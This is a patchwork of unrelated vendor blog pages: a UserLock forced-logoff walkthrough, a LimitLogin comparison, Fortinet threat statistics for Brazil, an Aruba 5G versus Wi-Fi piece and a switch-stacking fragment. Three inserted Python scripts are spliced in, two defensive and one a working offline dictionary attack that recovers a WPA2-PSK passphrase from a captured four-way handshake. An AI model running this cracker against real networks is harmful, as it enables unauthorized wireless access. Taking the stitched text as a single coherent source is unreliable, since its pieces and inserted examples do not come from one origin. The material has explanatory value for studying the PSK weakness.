Force Remote Logoff after Idle Time

Resolving Optimization and Security Issues

Fast and fluid access to shared workstations is key to their utility, but managing this access can be a challenge. Whether it's call center agents, hospital clinicians, reception desks or student computer labs, the problem is often the same: users log in and never log off. They simply lock the workstation and walk away. Once several users have clicked ‘Switch User’ to log in, enough applications are left running in the background from all these idle sessions to slow the system to a crawl.

Worse still, rather than locking, some users simply leave their session open. Forgotten sessions left open on shared workstations put user accounts at high risk of compromise: anyone who walks up inherits the logged-on user's access, and whatever they do is recorded under that user's identity.

Securing Shared Workstations

As an entry point to an organization’s information resources, these shared workstations must have the best possible security configuration.

With UserLock, IT administrators can set an automatic forced logoff, on all locked or open machines, after a certain idle time. This includes remote desktop sessions opened by the domain user. Access to data and resources is better secured, resources are freed up, and IT saves the time it would otherwise spend dealing with the resulting issues.

Video Transcription

In this video I’m going to show you how UserLock can be configured to allow you to automatically log off locked machines after an idle time.

So the first thing we need to do is make sure that on the target machines we have the screen saver option “on resume display logon screen”.

This can be enabled through a Microsoft GPO setting.

Back in the UserLock console we’re going to go to the properties of the agent distribution and here we’re going to check “consider screen saver time as locked time”, that way in UserLock we can recover the events as a locked session.


Click here to apply the new setting and this will be effective on the target machines at the next reboot or we can force it to be effective immediately by restarting the UserLock agent service on the target machine.

So once you’ve done that setting we need to now select the user accounts for which we’d like this setting to be enabled.

So we’re going to protect a new account, we can do this at the user, group or OU level. I’m going to do this for Active Directory group “everyone”.

I create my protected account and then by simply double-clicking on the protected account I have access to the properties and all of the settings and restrictions that I can set for this protected account.

So we’re going to go down to hour restrictions and here we have “Maximum locked time”. So once the screensaver has been enabled, we’re going to put in the amount of time that we will allow the computer to be locked before we force a logoff. So for example we can put 10 minutes.


By default the end user is going to receive a logout notification, that’s by default one minute before the log off. If we’d like to allow a little bit more time – if they’d like to bypass the logoff – we can change that here. So we can apply these settings.

So that’s it that’s how we can configure a forced logoff of computers that are open after a certain amount of idle time to free up workstations and to reduce unnecessary use of resources on your network.


  • The ‘Session’ options are supported by interactive session types (workstation and terminal).
  • The logoff initiated by these options is forced. Any unsaved documents will be lost.
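The walkthrough above configures the policy through the UserLock console. As an added example (not UserLock's code and not from the original page), the script below reproduces the same policy with the tools built into Windows: it parses the output of quser, selects sessions idle longer than the maximum (or disconnected), warns them with msg for the grace period, then forces a logoff with the logoff command. The quser output embedded in the script is constructed so the parsing can be exercised offline; on a real host it must run with administrative rights and the session threshold, grace period and exempt accounts are assumptions you would set to match your policy.

```python
"""Force logoff of Windows sessions that have been idle too long.

Added example, not UserLock's code: it reproduces the policy from the
walkthrough (maximum idle/locked time, a warning one minute before logoff)
with the built-in quser, msg and logoff commands. Assumptions: it runs on
the target host with administrative rights, and quser prints the standard
column layout shown in the constructed sample below.
"""
import re
import subprocess
import sys
import time

# Constructed sample of `quser` output, used for offline testing.
SAMPLE_QUSER = """\
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>svc-helpdesk          console             1  Active      none   3/1/2024 8:00 AM
 alice                 rdp-tcp#1           2  Active         7   3/1/2024 8:10 AM
 bob                                       3  Disc        1:25   3/1/2024 7:20 AM
 carol                 rdp-tcp#3           4  Active   2+03:15   2/28/2024 9:00 AM
"""

# SESSIONNAME is blank for disconnected sessions, so it is optional in the pattern.
LINE_RE = re.compile(
    r"^\s*>?(?P<user>\S+)\s+(?:(?P<session>\S+)\s+)?(?P<id>\d+)\s+"
    r"(?P<state>\S+)\s+(?P<idle>\S+)\s+(?P<logon>.+)$"
)


def idle_minutes(idle: str) -> int:
    """quser shows 'none' or '.' when not idle, then 'M', 'H:MM' or 'D+HH:MM'."""
    if idle in ("none", "."):
        return 0
    days = 0
    if "+" in idle:
        day_part, idle = idle.split("+", 1)
        days = int(day_part)
    if ":" in idle:
        hours, mins = idle.split(":", 1)
        return days * 1440 + int(hours) * 60 + int(mins)
    return days * 1440 + int(idle)


def parse_quser(text: str) -> list:
    sessions = []
    for line in text.splitlines()[1:]:  # first line is the column header
        m = LINE_RE.match(line)
        if not m:
            continue
        sessions.append({
            "user": m["user"],
            "id": int(m["id"]),
            "state": m["state"],
            "idle_min": idle_minutes(m["idle"]),
            "current": line.lstrip().startswith(">"),  # the session running this script
        })
    return sessions


def select_for_logoff(sessions, max_idle_min: int, protect=frozenset()) -> list:
    """Sessions idle at least max_idle_min minutes, plus disconnected ones (a 'Disc'
    RDP session keeps its processes alive with nobody at the keyboard).
    Never the current session, never accounts listed in `protect`."""
    return [s for s in sessions
            if not s["current"]
            and s["user"].lower() not in protect
            and (s["idle_min"] >= max_idle_min or s["state"] == "Disc")]


def enforce(max_idle_min=10, grace_seconds=60, dry_run=True, quser_text=None) -> list:
    """Warn each selected session, wait out the grace period, then force logoff.
    Returns the commands so a dry run can be inspected (and tested) without running them."""
    if quser_text is None:
        quser_text = subprocess.run(["quser"], capture_output=True, text=True).stdout
    victims = select_for_logoff(parse_quser(quser_text), max_idle_min)
    warnings = [["msg", str(s["id"]), f"/TIME:{grace_seconds}",
                 f"Idle {s['idle_min']} min: you will be logged off in {grace_seconds} s. Save your work."]
                for s in victims]
    logoffs = [["logoff", str(s["id"])] for s in victims]  # forced: unsaved work is lost
    if not dry_run and victims:
        for cmd in warnings:
            subprocess.run(cmd, check=False)
        time.sleep(grace_seconds)
        for cmd in logoffs:
            subprocess.run(cmd, check=False)
    return warnings + logoffs


if __name__ == "__main__":
    live = sys.platform == "win32" and "--apply" in sys.argv
    for cmd in enforce(dry_run=not live, quser_text=None if live else SAMPLE_QUSER):
        print(" ".join(cmd))
```

Without `--apply` the script only prints what it would do against the constructed sample. The idle column reflects input inactivity as reported by quser, not the lock state itself, so a locked console with no input counts as idle; disconnected RDP sessions are always selected because nobody can see the msg warning there anyway. Run it from a scheduled task under an account in the local Administrators group, and add that account to `protect` so it never logs itself off.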

A UserLock Case Study

Read how the Architectural Technology Department of the NYCCT (New York City College of Technology) stopped forgotten Windows sessions to secure their network and free up resources.

Going further with UserLock

Direct from the console, UserLock can interact remotely with any session, at any time. This includes a forced logoff to several machines at once or blocking a user with a single click.

Other use cases that involve managing user logins can be found here.

A Free Fully Functional 30 Day UserLock Trial

Don’t take our word for it, Download now the fully functional free trial and see for yourself how easily UserLock can bring a new level of security to your Windows Server Network.

LimitLogin vs UserLock

This blog post reviews how LimitLogin and UserLock limit concurrent user logins in an Active Directory domain.

It will focus on the concurrent connection restriction feature provided by each solution and discuss how else they help an organization secure user access for Windows Active Directory environments.



LimitLogin is an unsupported tool that was released in 2005. It was written by a Microsoft Partner Technology specialist and an Application Development Consultant. The aim of LimitLogin was to add the ability to track and limit concurrent workstation and terminal user logins in an Active Directory domain.


UserLock is an enterprise software solution that controls, audits and monitors user access to an Active Directory network. UserLock permits, denies or limits access based on a range of criteria; for example, preventing concurrent logins via a single identity, limiting access to certain device types and limiting network access methods. UserLock also monitors all sessions in real time providing alerts and information to respond to suspicious events and a log of access information for audit and forensics.

UserLock is developed by IS Decisions, a Microsoft Partner company founded in 2000, that specializes in solutions to safeguard and secure Microsoft Windows and Active Directory infrastructure.

Download NOW a fully functional Free Trial of UserLock. 30-day full version with no user limits

LimitLogin vs UserLock. A comparison

Feature                            | LimitLogin                           | UserLock
-----------------------------------|--------------------------------------|---------------------------------------------------
Agent technology                   | Logon scripts                        | Windows service*
AD schema modification             | Yes                                  | No
Web server requirement             | Yes                                  | No
Supported workstation OS           | Windows 2000 SP4, Windows XP SP1     | Windows XP, Vista, 7, 8, 8.1, 10
Supported server OS                | Windows Server 2003, 2008            | Windows Server 2008, 2008 R2, 2012, 2012 R2, 2016
64-bit OS support                  | No                                   | Yes
Client agent                       | Yes                                  | Yes
Integrated deployer                | No                                   | Yes
Workstation sessions               | Yes                                  | Yes
Terminal sessions                  | Yes                                  | Yes
Wi-Fi sessions                     | No                                   | Yes
VPN sessions                       | No                                   | Yes
IIS sessions                       | No                                   | Yes
Logon and logoff events audit      | Yes                                  | Yes
Lock and unlock events audit       | No                                   | Yes
Limit by user                      | Yes                                  | Yes
Limit by group                     | No                                   | Yes
Location restrictions              | No                                   | Yes
Time connection restrictions       | No                                   | Yes
Time quota features                | No                                   | Yes
Customizable messages              | No                                   | Yes
E-mail notifications               | No                                   | Yes
Pop-up notifications               | No                                   | Yes
Database of session activities     | No                                   | Yes
Printable and customizable reports | No (CSV / XML only)                  | Yes
Supported solution                 | No, not even by its provider Microsoft | Yes, by its vendor IS Decisions

Windows Service*: Except for old Windows XP and 2003 Server for which the micro agent technology is a GINA DLL.

Requirements and Specifications

LimitLogin is not compatible with Windows Server 2008 R2, 2012 and 2012 R2.

UserLock is certified for compliance and support with Windows Server 2016, 2012, 2012 R2, 2008 and 2008 R2.

LimitLogin doesn’t support 64-bit systems. UserLock does.

Similar to the status of the resource kit tools and/or the support tools, LimitLogin is not officially supported by Microsoft.


Limited Session Types with LimitLogin

LimitLogin is limited to monitoring workstation and terminal sessions. UserLock, on the other hand, takes into consideration all session types (workstation, terminal, interactive, Internet Information Services and Wi-Fi/VPN).


Architecture & Deployment

A summary comparing the architecture required to monitor and limit the number of workstation and terminal logins:

LimitLogin (built around 3 main elements):
– A web service that handles the back-end processing on the server.
– An application directory partition that holds the login information.
– Logon and logoff VBS scripts.

UserLock (a client/server application):
– A UserLock server on a Windows server.
– A micro-agent on each protected machine.
– Optionally, a SQL Server database.

LimitLogin: requires creating a new partition in Active Directory on a Windows domain controller.
UserLock: can be installed on any member server of the network; there is no requirement to use a domain controller.

LimitLogin: performs an Active Directory schema modification. This operation is irreversible and cannot be undone.
UserLock: performs no Active Directory modification.

LimitLogin: requires logon and logoff scripts.
UserLock: the micro-agent is deployed automatically through the UserLock console or as an MSI package.

LimitLogin: requires a web server set up for delegated Kerberos authentication, used for script communication and rule processing.
UserLock: encrypted communication between the server and the agents requires only Ping and Microsoft File and Printer Sharing protocols.

LimitLogin: login session information is stored in files that are not encrypted.
UserLock: session activities are stored in a database, which can be SQL Server Express or Server edition (a free database is provided).

Deploying LimitLogin

Microsoft LimitLogin was designed to help administrators apply login limits on their network. It is however complex to implement and risky, because the Active Directory schema modification it requires is irreversible.

Bill Boswell (Microsoft Certified Professional Magazine) wrote this very meticulous and precise breakdown on how to deploy LimitLogin:

“LimitLogin requires a bit of effort to deploy. For one thing, it performs a Schema modification. For another, it creates a new partition in Active Directory. It also requires configuring a Web server with the .NET Framework and ASP.NET and setting it up to do delegated Kerberos authentication. Finally, it requires distributing client packages that support communicating with the Web server via SOAP (a lightweight protocol for exchanging structured information in a distributed environment). Whoa. Don’t stop reading. It’s complicated, but not impossible. Really.”

Deploying UserLock

UserLock installs in minutes on a standard Windows Server. The installation can be done on any member server of the domain; there is no requirement to use a domain controller. Once installed, UserLock must deploy a micro-agent onto each workstation that is a member of the selected network zone. This can be done through the UserLock console, which contains an agent deployer with manual and automatic modes. UserLock reads Active Directory information but modifies nothing regarding accounts or schema.


The need to manage Concurrent connections

Most organizations that work in a Windows environment use Microsoft Active Directory to authenticate and control all users. However, Active Directory is by no means a foolproof security solution. Yes, it manages passwords and confirms that the user name matches the password, but it does not stop several people from logging on with the same credentials at the same time.

Limiting concurrent logins in a Windows environment therefore addresses one of the most potentially dangerous situations for a Windows Active Directory network: a single set of credentials in use from several places at once.

Preventing or limiting concurrent sessions:

  •  Stops users sharing their passwords. Users will think twice about sharing credentials, as they won’t be able to get on the system if someone else is logged in too
  •  Stops rogue users from using valid credentials at the same time as their legitimate owner
  •  Ensures access to critical assets is attributed to individual employees
  •  Helps satisfy the concurrent-session requirements of major regulatory frameworks, including NIST 800-53 (control AC-10, Concurrent Session Control), SOX, PCI DSS, HIPAA and the newly updated CJIS requirements.
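Active Directory records every interactive logon (Security event 4624) and logoff (event 4634) but, as the text says, never correlates them, so the same account being used from two workstations at once only becomes visible if something replays that stream. The following is an added example of that detection logic, not code from the original post or from UserLock: it walks a constructed CSV export of 4624/4634 events, tracks live sessions per account, and raises an alert whenever a new interactive logon puts the account on more hosts than the policy allows. The sample events, host names and logon IDs are all constructed.

```python
"""Detect one account with interactive sessions open on two workstations at once.

Added example, not part of the original post and not UserLock code. The lines
below are a constructed CSV export carrying the 4624/4634 fields that matter
(TargetUserName, WorkstationName, LogonType, TargetLogonId); a real feed would
come from a SIEM or Get-WinEvent.
"""
import csv
import io
from collections import defaultdict

# Constructed sample. LogonType 2 = console, 10 = RDP, 3 = network (file share), 7 = unlock.
SAMPLE_CSV = """\
TimeCreated,EventID,TargetUserName,WorkstationName,LogonType,TargetLogonId
2024-03-01T08:00:00,4624,jdoe,WS-101,2,0x3e7a1
2024-03-01T08:05:00,4624,asmith,WS-102,2,0x3f001
2024-03-01T08:10:00,4624,jdoe,FS-01,3,0x3f9c0
2024-03-01T08:20:00,4624,jdoe,WS-205,10,0x41b20
2024-03-01T08:30:00,4634,jdoe,WS-101,2,0x3e7a1
2024-03-01T08:40:00,4624,asmith,WS-102,7,0x42aa0
2024-03-01T08:45:00,4624,jdoe,WS-101,2,0x43c10
2024-03-01T09:00:00,4634,jdoe,WS-205,10,0x41b20
2024-03-01T09:10:00,4624,asmith,WS-310,2,0x45d00
"""

# Session-creating logon types; network (3), unlock (7) and service (5) logons are noise here.
INTERACTIVE_TYPES = {2, 10, 11}


def parse_events(text: str) -> list:
    rows = []
    for r in csv.DictReader(io.StringIO(text)):
        rows.append({"time": r["TimeCreated"], "id": int(r["EventID"]),
                     "user": r["TargetUserName"].lower(), "host": r["WorkstationName"].upper(),
                     "type": int(r["LogonType"]), "logon_id": r["TargetLogonId"]})
    return rows


def find_concurrent_logons(events: list, allowed_hosts: int = 1) -> list:
    """Replay the stream, track live sessions per account, and raise an alert whenever a
    new interactive logon would put the account on more than `allowed_hosts` machines."""
    live = defaultdict(dict)  # user -> {logon_id: host}
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        sessions = live[ev["user"]]
        if ev["id"] == 4634:
            sessions.pop(ev["logon_id"], None)  # a logoff closes that one session only
            continue
        if ev["id"] != 4624 or ev["type"] not in INTERACTIVE_TYPES:
            continue
        elsewhere = sorted({h for h in sessions.values() if h != ev["host"]})
        sessions[ev["logon_id"]] = ev["host"]
        if len(elsewhere) + 1 > allowed_hosts:
            alerts.append({"time": ev["time"], "user": ev["user"],
                           "host": ev["host"], "also_on": elsewhere})
    return alerts


def run_demo() -> list:
    return find_concurrent_logons(parse_events(SAMPLE_CSV))


if __name__ == "__main__":
    for a in run_demo():
        print(f"{a['time']} {a['user']} logged on at {a['host']} while still on {', '.join(a['also_on'])}")
```

Two design points matter in practice: sessions are keyed by TargetLogonId, so a logoff from one workstation does not clear the account's other sessions, and network logons (type 3) are ignored, since every file-share access would otherwise look like a second session. This detects the situation after the fact; preventing it is what a concurrent-login control such as LimitLogin or UserLock adds.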

Further Restrictions needed to Manage Network Access

The application LimitLogin allows an organization to manage only the number of user logins.

With UserLock, concurrent login control is just one part of a granular access control policy. UserLock sets and enforces login control based on multiple criteria in a matrix of access rules defined per user, user group or organizational unit.

Control from where a protected account may log on: restrict domain users to a workstation or device, IP range, department, floor or building.

Control the hours and days when protected users can log on to the network: define working hours and/or a maximum session time.


Microsoft LimitLogin was a free tool that, in the past, helped administrators apply login limits on their network. It was however complex to implement and risky, because the Active Directory schema modification it required is irreversible.

In today’s world, LimitLogin is unable to meet the critical needs of many organizations. Operating systems which have appeared during the past six years are not supported, only the number of user sessions can be controlled – no further restrictions by location or time, and it is limited to only workstation and terminal sessions.

Defining and enforcing a full user access policy to ensure the security of your network access and the protection of your data requires more context than a count of sessions.

The number of simultaneous accesses is not sufficient. You need to know, analyze and control who, how, when, how many times and from where access to the enterprise network is requested, whether the request comes from a machine, through the VPN, over a wireless connection, or from a web application or an intranet.

UserLock answers these needs with an effective network access management tool that is simple to manage and easy to use. A customized access policy can be set and enforced to permit or deny user logins. Concurrent sessions can be prevented, and access restricted to specific workstations or devices, times, business hours and connection types (including Wi-Fi).


Case Study: Bank of Cyprus reduces security risks from internal users with UserLock

Disclaimer: The comparison juxtaposes the features of IS Decisions UserLock and LimitLogin based on the publicly available information as of February 11, 2014.

Brazil suffered 15 billion attempted cyberattacks in the second quarter of 2019

Fortinet, a global leader in broad, integrated and automated cybersecurity solutions, announced the results of its latest threat research, revealing that Brazil suffered 15 billion attempted cyberattacks in just three months, between March and June 2019. Fortinet's threat intelligence service, FortiGuard, detected the prevalence of old attacks such as those used by the WannaCry ransomware in 2017 and those that seriously breached banks in Chile and Mexico in 2018. The effectiveness of this kind of attack indicates that unpatched or outdated systems are still present in Brazilian companies and that greater investment in cybersecurity technologies is critically needed.

According to Frederico Tostes, Country Manager of Fortinet in Brazil: “Cybersecurity has gone from a complementary element to a critical need for every company in its digital transformation process. The question is no longer ‘what do we do if we suffer a cyberattack?’ but rather ‘what do we do when we suffer a cyberattack?’. Today cybersecurity is a global issue, and Brazil also occupies an important place in the world as a target for cybercriminals. We see threats growing at an alarming rate, both in quantity and in sophistication.”

The FortiGuard research results were presented at the Fortinet CyberSecurity Summit (FSC19), an event that brought together 1,000 network security specialists from various sectors in São Paulo to discuss today's key digital dangers, the risk landscape for the coming years, and how professionals and companies can prepare for these new kinds of attacks. The most prominent results include:

• Old, well-known threats remain very active in Brazil

o DoublePulsar, the backdoor used to deliver malware in well-known attacks such as the WannaCry ransomware in 2017 and the attacks on banks in Chile and Mexico last year, was among the three most detected threats in Brazil in the second quarter of 2019.

• A large number of attempted application exploits aimed at denial of service

o Around 73% of the network intrusion attempts detected in Brazil exploited a vulnerability that allows a command to be triggered to generate denial-of-service attacks against NTP servers (Network Time Protocol is an Internet protocol for synchronizing the clocks of computer systems over packet-switched networks).

• Windows malware used for cryptomining

o Around 33% of the malware detected in Brazil was a worm with trojan characteristics that affects computers running Windows. It can be considered a serious attack if you do not have an up-to-date antivirus.

o In addition, CoinHive, malware used for in-browser Monero cryptomining, was the second most detected in Brazil during the second quarter of the year.

• IoT devices remain under threat from the Mirai botnet

o Since it appeared in 2016, the Mirai botnet, which attacks IoT devices, has continued to produce an explosion of variants and activity. Ranked second in Brazil, it is still used by cybercriminals as an opportunity to take control of these devices.

“Cybersecurity is an issue we have to deal with as a priority. Security needs to be rethought comprehensively so that we are better prepared to prevent, detect and automatically respond to threats,” Tostes added. “Raising awareness of the risks, promoting comprehensive training of young professionals, helping with adaptation to new regulations such as the Lei Geral de Proteção de Dados, and continuing to focus on advising the market through our specialists and our local network of channel partners are priorities for Fortinet in Brazil.”

Fortinet is the number one cybersecurity company in Brazil, with the largest number of security appliances shipped in the country, holding a 50.12% share of the firewall, unified threat management, intrusion detection and prevention, and virtual private network markets (IDC data).

Its advanced security architecture, together with a team of specialists, allows Fortinet to help Brazilian organizations accelerate their digital transformation without compromising security. The Fortinet Security Fabric's ability to protect every point of the network gives customers the comprehensive threat protection needed to face constantly evolving cybersecurity challenges.


Comparing 5G to Wi-Fi 6 from a Security Perspective

Enterprise-grade Wi-Fi systems have proven to be secure for thousands of demanding customers across virtually all industries. With the recent hype around 5G and service providers promoting 5G as an alternative to Wi-Fi in the enterprise, it pays to understand how 5G security stacks up against Wi-Fi security.

Understanding 5G and Wi-Fi Security

Cellular security has improved with each generation. The security of first-generation analog cellular systems, based on the AMPS (Advanced Mobile Phone System) standard, was essentially non-existent: calls were unencrypted and could be intercepted with basic scanners. The security of currently deployed LTE networks is far better. LTE uses stronger encryption and an authentication and key agreement protocol (“AKA”) that mutually authenticates the device and the network and derives the session keys shared between the device and the serving base station. But while LTE security is solid, it isn’t perfect.

According to researchers at Purdue and the University of Iowa, LTE is vulnerable to some types of cyberattacks, including data interception and device tracking. The Associated Press last year reported the US Department of Homeland Security (DHS) has acknowledged the existence in Washington, DC of cell site simulators, called “Stingrays,” that could track cellular devices, intercept calls, and potentially even plant malware. 5G security improves upon LTE security incrementally, with identical encryption, slightly hardened authentication, and better key management. But overall, 5G security is largely comparable to LTE security.

Just as cellular security has improved, Wi-Fi security has evolved with each generation. Early Wi-Fi networks, beginning in the late 90s, used weak encryption and authentication, called “WEP”. The subsequent WPA and WPA2 standards feature improved encryption. Authentication with WPA2 can be either enterprise-grade 802.1X, or the weaker PSK (pre-shared key). PSK can be attacked offline: an attacker who captures a client’s four-way handshake can test candidate passphrases until one reproduces the handshake’s message integrity code, without ever talking to the access point again. This is called a dictionary attack. For this reason, most of our enterprise customers implement WPA2 with 802.1X, whose handshake never exposes the credential and so is not prone to dictionary attacks. While some people claim Wi-Fi is insecure, pointing to poorly implemented networks that disable all password protection (e.g., a local coffee shop), this is not representative of enterprise practice. Still, the Wi-Fi industry developed WPA2 15 years ago, at a time when the wireless, computing, and security landscapes were substantially different.
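To make the WPA2-PSK weakness concrete, here is an added example (not from the original post, and not Aruba's code) of the offline dictionary attack it describes. The script derives the PMK from a passphrase and SSID exactly as 802.11 specifies (PBKDF2-HMAC-SHA1, 4096 iterations), expands it to the PTK with both MAC addresses and both nonces, and checks a guessed passphrase by recomputing the MIC on message 2 of the four-way handshake. Everything an attacker needs is sent in the clear, so the only secret is the passphrase. The SSID, MAC addresses, nonces, passphrase and word list are constructed, and the "captured" frame is built locally rather than sniffed.

```python
"""Offline dictionary attack on a captured WPA2-PSK four-way handshake.

Added example, not from the original post. Everything an attacker needs is
sent in the clear: SSID, both MAC addresses, ANonce (message 1), SNonce and
the MIC (message 2). Only the PMK is secret, and it is a deterministic
function of the passphrase and SSID, so each guess can be checked offline.
All values here are constructed; the frame is built locally, not captured.
"""
import hashlib
import hmac

MIC_OFFSET = 81     # 802.1X header (4) + EAPOL-Key fields preceding the Key MIC
SNONCE_OFFSET = 17  # header (4) + descriptor type (1) + key info (2) + key length (2) + replay counter (8)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11 PRF-384: HMAC-SHA1(PMK, "Pairwise key expansion" || 0x00 || data || i).
    Returns KCK (16) || KEK (16) || TK (16) for CCMP."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(3)
    )
    return out[:48]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1-128 over the frame with the MIC field zeroed."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_message2(passphrase, ssid, aa, spa, anonce, snonce) -> bytes:
    """Stand-in for a sniffed message 2: an EAPOL-Key frame carrying SNonce and a MIC."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    body = (b"\x02"                           # descriptor type: RSN
            + b"\x01\x0a"                     # key info: version 2 (HMAC-SHA1), pairwise, MIC set
            + b"\x00\x10"                     # key length 16
            + bytes(8)                        # replay counter
            + snonce                          # 32-byte SNonce
            + bytes(16) + bytes(8) + bytes(8) # key IV, key RSC, reserved
            + bytes(16)                       # MIC placeholder
            + b"\x00\x00")                    # key data length 0
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v1, type EAPOL-Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def dictionary_attack(ssid, aa, spa, anonce, msg2, candidates):
    """Try each candidate passphrase; the one whose KCK reproduces the MIC is the network key."""
    snonce = msg2[SNONCE_OFFSET:SNONCE_OFFSET + 32]
    target = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for guess in candidates:
        kck = ptk_from_pmk(pmk_from_passphrase(guess, ssid), aa, spa, anonce, snonce)[:16]
        if eapol_mic(kck, msg2) == target:
            return guess
    return None


# Constructed scenario with deterministic nonces so the run is reproducible.
SSID = "CorpGuest"
AP_MAC = bytes.fromhex("02aa00000001")   # locally administered, fictional
STA_MAC = bytes.fromhex("02bb00000002")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
REAL_PASSPHRASE = "sunshine2019"
WORDLIST = ["password", "corpguest", "Summer2019!", "sunshine2019", "welcome1"]


def run_demo() -> str:
    msg2 = build_message2(REAL_PASSPHRASE, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE)
    return dictionary_attack(SSID, AP_MAC, STA_MAC, ANONCE, msg2, WORDLIST)


if __name__ == "__main__":
    print("recovered passphrase:", run_demo())
```

The cost per guess is one PBKDF2 run of 4096 SHA-1 iterations, which is exactly what a GPU cracker parallelizes; nothing in the loop contacts the network, so rate limiting at the access point does not help. WPA3-Personal's SAE handshake removes the target: the PMK there depends on an ephemeral exchange, so a passive capture gives an attacker nothing to test guesses against, and with 802.1X the credential never appears in the over-the-air handshake at all.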

Recently, the Wi-Fi Alliance responded with WPA3—a significant update to Wi-Fi security. Aruba is a leader in the development of WPA3. WPA3 implementations fall into one of three categories: (1) OWE (“Enhanced Open”), which encrypts traffic to prevent snooping attacks on open networks that do not have password protection, (2) WPA3-Personal, which uses a shared secret with a cryptographically stronger key exchange (SAE) that is resistant to dictionary attacks, and (3) WPA3-Enterprise, which significantly strengthens enterprise-grade 802.1X and optionally includes the same Suite B/CNSA crypto algorithms used for Top Secret or higher classified government networks. Unlike 5G, which is not backward-compatible and requires completely new handsets and radio networks, customers can upgrade the software on most of Aruba’s currently deployed Wi-Fi networks to include WPA3 (unless they are implementing Suite B/CNSA). We expect major handset OS vendors, such as Apple and Google, to roll out WPA3 and Enhanced Open by the end of 2019. WPA3 certification will be mandatory for all new Wi-Fi 6 equipment starting later this year.

It’s also worth noting that cellular encryption generally has lagged Wi-Fi encryption. For example, the A5/1 cipher used in 2G GSM has a 64-bit key, whereas WPA2-AES, part of Wi-Fi since 2004, uses 128-bit keys. LTE and 5G use 128-bit keys, and a future release of the 5G standard may move to 256-bit keys. Wi-Fi already supports 256-bit encryption through the Suite B/CNSA extensions of WPA3.

Until this point, we’ve highlighted the evolution and current state of authentication, encryption, and key management for cellular and Wi-Fi standards. These are important security design elements. But it’s also important to consider a customer’s ability to tailor its networks to suit its needs by applying specific security and compliance tools and policies. The average security buyer at a large enterprise uses more than 50 different security and compliance tools, and no two organizations have exactly the same needs. Our customers have been successfully deploying their chosen security and policy tools to enterprise Wi-Fi networks for decades. The architecture of these networks is flexible and allows customers to break out, analyze, and apply policy to traffic. Wi-Fi 6 and WPA3 completely retain this flexibility.

5G is a different story. If an enterprise wants to replace Wi-Fi with 5G, there are a few different approaches. Each has implications for security customization.

  • The first approach is to extend macro 5G service into the enterprise using DAS (Distributed Antenna Systems) or small cells. With this approach, it is difficult to break out traffic and implement specific security solutions. In other words, you get what you get.
  • If your company is large enough, and your service provider is willing to sell and manage an individualized Network Slice, you could buy a slice specific to your company. Network slicing enables carriers to create customized virtual network overlays under one nationwide, physical network. With slicing, they can tune each of these virtual networks to serve business cases that require specific network characteristics. Your service provider may sell a low-latency network slice, or an IoT-oriented network slice. You could then have the service provider apply specific security solutions to that slice and possibly even manage it for you, as a part of their network. But all traffic passing over such a slice would be invisible to security appliances that are wired directly into an enterprise network.
  • Your enterprise could choose to deploy a private 5G network on your premises, using either spectrum licensed from a service provider, or possibly other spectrum that is unlicensed (e.g., CBRS spectrum). You can apply security to a private 5G network in a similar way you can apply it to an enterprise Wi-Fi network, but this requires investing in completely separate, parallel network infrastructure. Consequently, this approach will likely be limited to very specific enterprise use cases.

Security is not a monolithic consideration. It includes elements like authentication, encryption, and key management. For well-designed and deployed networks, we believe these elements for Wi-Fi 6 are equal to, or better than, 5G. An equally important consideration is the ability of an enterprise to apply the specific security and policy tools to their network in a flexible way, tailored to its needs. Wi-Fi enterprise networks are highly flexible, as they always have been. But depending on the deployment approach for a 5G network, it may or may not be able to accommodate the level of security and compliance customization required by enterprise customers.

Aruba Executive Perspectives on 5G and Wi-Fi 6
Jeff Lipton: Making Sense of 5G and Wi-Fi in the Enterprise

Stuart Strickland: What is 5G?

Stuart Strickland: Wi-Fi as the On-Ramp to 5G


Stacking Network Switches: Why and Why Not

What are Stackable Switches?
In networking, the term “stack” (or stackable) refers to a group of physical switches that have been cabled and grouped in one single logical switch. Over the years, stacking features have evolved from a premium (and costly feature) to a core capability of almost all enterprise-grade switches (and also in several SMB models).

A stack of switches (in this example Aruba 3810 Switch Series)

It’s the opposite approach of a modular switch, where you have a single physical chassis with several slots and modules to grow your switch, used typically, at least in the past, in core switches.

A modular switch (in this example: Aruba 8400 Switch Series)

Both can provide a single management and control plane or at least a single configurable logical switch, with some kind of redundancy if you lose a physical switch or a module.

Having a single logical switch, with better reliability, makes it easy to translate the logical network topology into the physical topology.

What are Stacking Technologies?
In stackable switches, the stack is usually built with cables that connect all the switches in a specific topology.

Those cables connect to specific ports on the switches, depending on the type of stacking:

  • Backplane stacking (BPS), where dedicated stacking modules (usually on the back of the switch) are used with vendor-specific cables.
  • Front-plane stacking (FPS), also called VSF, where standard Ethernet ports and standard Ethernet cables are used to build the stack.

The stacking topology also defines the resiliency of the stacked solution. Typically there are different cabling options (depending on the switch vendor and model):

  • Daisy chain or bus, rarely used because it provides no resiliency
  • Ring or redundant dual ring, which provides resiliency, but with more than two switches the packet paths may not be optimal
  • Mesh or full mesh, which provides higher resiliency and optimal packet paths

For example, the Aruba 3810 Switch Series uses a dedicated stack module (on the back) and supports all those topologies (the ring topology only with a single ring).

In the ring topology you can have up to 10 stack members:

Aruba 3810 Switch Series stacking: Ring topology

